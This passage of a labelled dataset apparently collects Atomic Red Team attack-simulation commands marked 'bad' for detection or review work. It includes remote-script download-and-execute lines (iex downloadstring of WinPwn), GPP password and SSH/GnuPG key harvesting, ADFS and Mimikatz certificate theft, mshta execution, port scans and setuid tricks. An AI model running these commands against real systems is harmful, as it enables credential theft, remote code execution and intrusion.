Path.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 341e5ada111ecb99e1e490f7,"mshta.exe ""about:'""","mshta.exe ""about:'""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Mshta used to Execute PowerShell,T1218.005,"[""T1218.005""]",windows,0.9,False,"Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cd85bd88e8420488056e66a7,findstr /S cpassword %logonserver%\sysvol\*.xml,findstr /S cpassword %logonserver%\sysvol\*.xml,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.006/T1552.006.yaml,GPP Passwords (findstr),T1552.006,"[""T1552.006""]",windows,0.9,False,"Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4fbc193ab0ffae7ddaf453ce,". ""#{gpp_script_path}"" Get-GPPPassword -Verbose",". ""#{gpp_script_path}"" Get-GPPPassword -Verbose",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.006/T1552.006.yaml,GPP Passwords (Get-GPPPassword),T1552.006,"[""T1552.006""]",windows,0.9,False,"Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate ""No preference files found"". ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cee18ef22db0b70730608308,"Get-CimInstance -Query ""SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')""","Get-CimInstance -Query ""SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1592.001/T1592.001.yaml,Enumerate PlugNPlay Camera,T1592.001,"[""T1592.001""]",windows,0.9,False,"Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host. reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 74c1b4c0c04aa31491d80d54,xattr -d com.apple.quarantine #{app_path},xattr -d com.apple.quarantine #{app_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.001/T1553.001.yaml,Gatekeeper Bypass,T1553.001,"[""T1553.001""]",macos,0.9,False,"Gatekeeper Bypass via command line ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1b86828eb7272a7ed8c7b308,for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done,for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Port Scan,T1046,"[""T1046""]","linux,macos",0.9,False,"Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d037f422607537691d24d706,sudo nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port},sudo nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Port Scan Nmap,T1046,"[""T1046""]","linux,macos",0.9,False,"Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4b1e55b1d016944d513aa3dc,nmap #{host_to_scan},nmap #{host_to_scan},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Port Scan NMap for Windows,T1046,"[""T1046""]",windows,0.9,False,Scan ports to check for listening ports for the local host 127.0.0.1,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58253d8db28abeae22175cd0,"python ""#{filename}"" -i #{host_ip}","python ""#{filename}"" -i #{host_ip}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Port Scan using python,T1046,"[""T1046""]",windows,0.9,False,"Scan ports to check for listening ports with python ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6cdb275897665f10fcf7723a,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,WinPwn - spoolvulnscan,T1046,"[""T1046""]",windows,0.9,False,Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 55d2a9a7b752c50f40bbb952,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,WinPwn - MS17-10,T1046,"[""T1046""]",windows,0.9,False,Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review abc1d6d5dbb2ee875c26134b,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,WinPwn - bluekeep,T1046,"[""T1046""]",windows,0.9,False,Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1ae8788ada7b084f30bf908e,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,WinPwn - fruit,T1046,"[""T1046""]",windows,0.9,False,Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c875263c84158e9312898a17,docker build -t t1046 $PathToAtomicsFolder/T1046/src/ docker run --name t1046_container --rm -d -t t1046 docker exec t1046_container /scan.sh,docker build -t t1046 $PathToAtomicsFolder/T1046/src/ docker run --name t1046_container --rm -d -t t1046 docker exec t1046_container /scan.sh,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Network Service Discovery for Containers,T1046,"[""T1046""]",containers,0.9,False,"Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 471d23258b300c39559f63ce,docker stop t1046_container docker rmi -f t1046,docker stop t1046_container docker rmi -f t1046,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Network Service Discovery for Containers,T1046,"[""T1046""]",containers,0.55,True,"Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 363b8fb29593918506ff19ef,"Get-Service -Name ""Remote Desktop Services"", ""Remote Desktop Configuration""","Get-Service -Name ""Remote Desktop Services"", ""Remote Desktop Configuration""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Remote Desktop Services Discovery via PowerShell,T1046,"[""T1046""]",windows,0.9,False,"Availability of remote desktop services can be checked using get- cmdlet of PowerShell ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1698629fc4fb38c4b20f543e,nmap -Pn -sV -p #{port_range} #{host},nmap -Pn -sV -p #{port_range} #{host},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1046/T1046.yaml,Port Scan using nmap (Port range),T1046,"[""T1046""]","linux,macos",0.9,False,"Scan multiple ports to check for listening ports with nmap ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a1aae702447cd04223ac916f,dir c:\ /b /s .key | findstr /e .key,dir c:\ /b /s .key | findstr /e .key,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Private Keys,T1552.004,"[""T1552.004""]",windows,0.9,False,"Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 968826161e495bf4c6f4ec4f,find #{search_path} -name id_rsa 2>/dev/null >> #{output_file} exit 0,find #{search_path} -name id_rsa 2>/dev/null >> #{output_file} exit 0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Discover Private SSH Keys,T1552.004,"[""T1552.004""]","linux,macos",0.9,False,"Discover private SSH keys on a FreeBSD, macOS or Linux system. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cdc9e20c3d5a438fb90d9114,rm #{output_file},rm #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Discover Private SSH Keys,T1552.004,"[""T1552.004""]","linux,macos",0.55,True,"Discover private SSH keys on a FreeBSD, macOS or Linux system. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6871e7f5747ee7308ba060d7,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec cp --parents {} #{output_folder} \; exit 0,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec cp --parents {} #{output_folder} \; exit 0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy Private SSH Keys with CP,T1552.004,"[""T1552.004""]",linux,0.9,False,"Copy private SSH keys on a Linux system to a staging folder using the `cp` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 67971ce4fba01640cff515cb,rm -rf #{output_folder},rm -rf #{output_folder},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy Private SSH Keys with CP,T1552.004,"[""T1552.004""]",linux,0.55,True,"Copy private SSH keys on a Linux system to a staging folder using the `cp` command. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 421403f98cc218eb0478bb37,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy Private SSH Keys with CP (freebsd),T1552.004,"[""T1552.004""]",linux,0.9,False,"Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1b08158c247d82d631c82f39,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \; exit 0,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \; exit 0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy Private SSH Keys with rsync,T1552.004,"[""T1552.004""]","macos,linux",0.9,False,"Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 529124ddc7e746b3d6b7a18c,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;,mkdir #{output_folder} find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy Private SSH Keys with rsync (freebsd),T1552.004,"[""T1552.004""]",linux,0.9,False,"Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3fef4702f1942811d7724b84,mkdir #{output_folder} find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \; exit 0,mkdir #{output_folder} find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \; exit 0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy the users GnuPG directory with rsync,T1552.004,"[""T1552.004""]","macos,linux",0.9,False,"Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eb0a9c597c19020c01f9d6a7,mkdir #{output_folder} find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;,mkdir #{output_folder} find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Copy the users GnuPG directory with rsync (freebsd),T1552.004,"[""T1552.004""]",linux,0.9,False,"Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f9d52635918cb497949723d4,"Import-Module AADInternals -Force Export-AADIntADFSCertificates Get-ChildItem | Where-Object {$_ -like ""ADFS*""} Write-Host ""`nCertificates retrieved successfully""","Import-Module AADInternals -Force Export-AADIntADFSCertificates Get-ChildItem | Where-Object {$_ -like ""ADFS*""} Write-Host ""`nCertificates retrieved successfully""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,ADFS token signing and encryption certificates theft - Local,T1552.004,"[""T1552.004""]",windows,0.9,False,"Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server. Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6e9a39e3ae28c90db0e7d400,"Remove-Item -Path "".\ADFS_encryption.pfx"" -ErrorAction Ignore Remove-Item -Path "".\ADFS_signing.pfx"" -ErrorAction Ignore","Remove-Item -Path "".\ADFS_encryption.pfx"" -ErrorAction Ignore Remove-Item -Path "".\ADFS_signing.pfx"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,ADFS token signing and encryption certificates theft - Local,T1552.004,"[""T1552.004""]",windows,0.55,True,"Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server. Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c38166f7adad0b2bd4f6de0e,IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output},IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,CertUtil ExportPFX,T1552.004,"[""T1552.004""]",windows,0.9,False,"The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/cod",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 16744eedb3407db3ae6ce96d,Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item,Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,CertUtil ExportPFX,T1552.004,"[""T1552.004""]",windows,0.55,True,"The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/cod",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0714c6e7581bd48c20971a14,"$mypwd = ConvertTo-SecureString -String ""AtomicRedTeam"" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Set-Location Cert:\LocalMachine\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd","$mypwd = ConvertTo-SecureString -String ""AtomicRedTeam"" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Set-Location Cert:\LocalMachine\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Export Root Certificate with Export-PFXCertificate,T1552.004,"[""T1552.004""]",windows,0.9,False,"Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet. Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 301cd9b1a3d145aaf2dc57e8,try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Export Root Certificate with Export-PFXCertificate,T1552.004,"[""T1552.004""]",windows,0.55,True,"Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet. Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4e1ce434da0d214972996825,$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Set-Location Cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path},$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Set-Location Cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Export Root Certificate with Export-Certificate,T1552.004,"[""T1552.004""]",windows,0.9,False,"Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet. Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df190f218389208df321ab12,try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Export Root Certificate with Export-Certificate,T1552.004,"[""T1552.004""]",windows,0.55,True,"Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet. Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e2048a3a029eb3aeea2d2833,"""#{mimikatz_exe}"" ""crypto::certificates /systemstore:local_machine /store:my /export"" exit","""#{mimikatz_exe}"" ""crypto::certificates /systemstore:local_machine /store:my /export"" exit",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.004/T1552.004.yaml,Export Certificates with Mimikatz,T1552.004,"[""T1552.004""]",windows,0.9,False,"The following Atomic test will utilize Mimikatz to extract the certificates from the local system My store. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. A successful attempt will stdout the certificates and write multiple .pfx and .der files to disk. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 54ecd079c974302ac53620a2,cp #{payload} /tmp/hello.c sudo chown root /tmp/hello.c sudo make /tmp/hello sudo chown root /tmp/hello sudo chmod u+s /tmp/hello /tmp/hello,cp #{payload} /tmp/hello.c sudo chown root /tmp/hello.c sudo make /tmp/hello sudo chown root /tmp/hello sudo chmod u+s /tmp/hello /tmp/hello,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify binary from C source,T1548.001,"[""T1548.001""]","macos,linux",0.9,False,"Make, change owner, and change file attributes on a C source code file ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7f365b677d0a0705ec182fcf,sudo rm /tmp/hello sudo rm /tmp/hello.c,sudo rm /tmp/hello sudo rm /tmp/hello.c,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify binary from C source,T1548.001,"[""T1548.001""]","macos,linux",0.55,True,"Make, change owner, and change file attributes on a C source code file ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49ac3fd35ab58a3aa270a16f,cp #{payload} /tmp/hello.c chown root /tmp/hello.c make /tmp/hello chown root /tmp/hello chmod u+s /tmp/hello /tmp/hello,cp #{payload} /tmp/hello.c chown root /tmp/hello.c make /tmp/hello chown root /tmp/hello chmod u+s /tmp/hello /tmp/hello,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify binary from C source (freebsd),T1548.001,"[""T1548.001""]",linux,0.9,False,"Make, change owner, and change file attributes on a C source code file ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2065da781747f0dff77bb70a,rm /tmp/hello rm /tmp/hello.c,rm /tmp/hello rm /tmp/hello.c,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Make and modify binary from C source (freebsd),T1548.001,"[""T1548.001""]",linux,0.55,True,"Make, change owner, and change file attributes on a C source code file ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2c18366fbcb719d90e96143b,sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod u+xs #{file_to_setuid},sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod u+xs #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetUID flag on file,T1548.001,"[""T1548.001""]","macos,linux",0.9,False,"This test sets the SetUID flag on a file in FreeBSD. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 585f68a68ffb666a47d39de1,sudo rm #{file_to_setuid},sudo rm #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetUID flag on file,T1548.001,"[""T1548.001""]","macos,linux",0.55,True,"This test sets the SetUID flag on a file in FreeBSD. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 20032040d221481d05315c44,touch #{file_to_setuid} chown root #{file_to_setuid} chmod u+xs #{file_to_setuid},touch #{file_to_setuid} chown root #{file_to_setuid} chmod u+xs #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetUID flag on file (freebsd),T1548.001,"[""T1548.001""]",linux,0.9,False,"This test sets the SetUID flag on a file in FreeBSD. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cfcdb369f0b3b9b511ddb251,rm #{file_to_setuid},rm #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetUID flag on file (freebsd),T1548.001,"[""T1548.001""]",linux,0.55,True,"This test sets the SetUID flag on a file in FreeBSD. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review efaab1a43a5b19013db321b7,sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod g+xs #{file_to_setuid},sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod g+xs #{file_to_setuid},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.001/T1548.001.yaml,Set a SetGID flag on file,T1548.001,"[""T1548.001""]","macos,linux",0.9,False,"This test sets the SetGID flag on a file in Linux and macOS. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c0f95b5754239a258ab12d76,touch #{file_to_setuid} chown root #{file_to_setuid} chmod g+xs #{file_to_setuid},touch 